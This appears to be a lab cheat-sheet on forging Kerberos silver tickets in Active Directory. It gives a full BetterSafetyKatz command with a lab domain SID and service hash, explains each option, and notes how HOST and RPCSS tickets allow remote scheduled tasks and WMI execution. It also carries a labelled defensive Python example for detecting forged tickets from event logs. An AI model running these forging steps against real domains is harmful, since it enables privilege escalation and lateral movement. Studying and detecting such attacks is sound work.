Silver Ticket

A silver ticket is signed and encrypted with the hash of the service account, which makes it a valid TGS (service) ticket for that service.

Create The Ticket

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden 
/User:Administrator /domain:dollarcorp.moneycorp.local
/sid:S-1-5-21-719815819-3726368948-3917688648 
/target:dcorp-dc.dollarcorp.moneycorp.local
/service:CIFS /rc4:e9bb4c3d1327e29093dfecab8c2676f6 
/startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Options

kerberos::golden

Name of the module

/User:Administrator

Username for which the ticket is generated

/domain:

Domain FQDN

/sid:

SID of the domain

/target:

Target server FQDN

/service:

The SPN name of service for which TGS is to be created

/aes256:

AES256 key of the account used to encrypt the ticket (the krbtgt account for a golden ticket; for a silver ticket, the service account, whose NT hash is passed with /rc4 above)

/id:500 /groups:512

Optional user RID and group RIDs

/ptt

Pass-the-ticket: inject the ticket into the current process

/startoffset:0

Optional. Offset in minutes from now at which the ticket becomes valid; use a negative value for a ticket that starts in the past and a larger positive value for one that starts in the future.

/endin:600

Optional. Ticket lifetime in minutes (default 10 years). The default AD setting is 10 hours = 600 minutes.

/renewmax:10080

Optional. Maximum renewable lifetime in minutes (default 10 years). The default AD setting is 7 days = 10080 minutes.
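As an added defensive example (not from the original page or the tool it describes): because a silver ticket is encrypted with the service account key and is never requested from the KDC, a Kerberos network logon (event 4624) on the target host with no matching service ticket request (event 4769) on the DC is the signal to hunt for, and a ticket whose lifetime exceeds the AD defaults quoted above is a second one. The event records, field names and hostnames below are constructed.

```python
from datetime import datetime, timedelta

# AD default lifetimes from the option table above (minutes).
AD_MAX_TICKET_MIN = 600     # 10 hours
AD_MAX_RENEW_MIN = 10080    # 7 days

# Constructed sample events (not real logs): 4769 TGS requests seen on the DC and
# 4624 logons seen on the member server. 4769 "service" is the service account name.
DC_4769 = [
    {"time": "2024-05-01T10:00:05", "account": "jdoe", "service": "DCORP-ADMINSRV$"},
]
HOST_4624 = [
    {"time": "2024-05-01T10:00:09", "account": "jdoe", "host": "DCORP-ADMINSRV",
     "auth": "Kerberos", "logon_type": 3},
    {"time": "2024-05-01T10:03:00", "account": "Administrator", "host": "DCORP-ADMINSRV",
     "auth": "Kerberos", "logon_type": 3},
]

def parse(ts):
    return datetime.fromisoformat(ts)

def unbacked_kerberos_logons(host_events, dc_events,
                             window=timedelta(minutes=AD_MAX_TICKET_MIN)):
    """Return Kerberos network logons (4624, type 3) on the host that have no 4769 on the
    DC for the same account and target machine account within `window` before the logon.
    The window equals the max ticket lifetime because a legitimately cached service ticket
    can be reused for up to that long after its single 4769. Requires Kerberos service
    ticket auditing to be enabled on the DCs, otherwise every logon looks unbacked."""
    flagged = []
    for ev in host_events:
        if ev["auth"] != "Kerberos" or ev["logon_type"] != 3:
            continue
        t = parse(ev["time"])
        machine_acct = ev["host"].upper() + "$"
        backed = any(
            d["account"].lower() == ev["account"].lower()
            and d["service"].upper() == machine_acct
            and t - window <= parse(d["time"]) <= t
            for d in dc_events
        )
        if not backed:
            flagged.append(ev)
    return flagged

def lifetime_exceeds_policy(start, end, renew_until):
    """True if a ticket's lifetime or renewable lifetime (e.g. as shown by klist) exceeds
    the domain defaults; forged tickets are often minted with the tool default of 10 years."""
    life = (parse(end) - parse(start)) / timedelta(minutes=1)
    renew = (parse(renew_until) - parse(start)) / timedelta(minutes=1)
    return life > AD_MAX_TICKET_MIN or renew > AD_MAX_RENEW_MIN
```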

Abusing Services

HOST

A ticket for the HOST service allows creating scheduled tasks on the remote computer. The silver ticket must be created with the NT hash of the target machine account.

HOST + RPCSS

With tickets for both of these services you can execute WMI commands on the victim system:
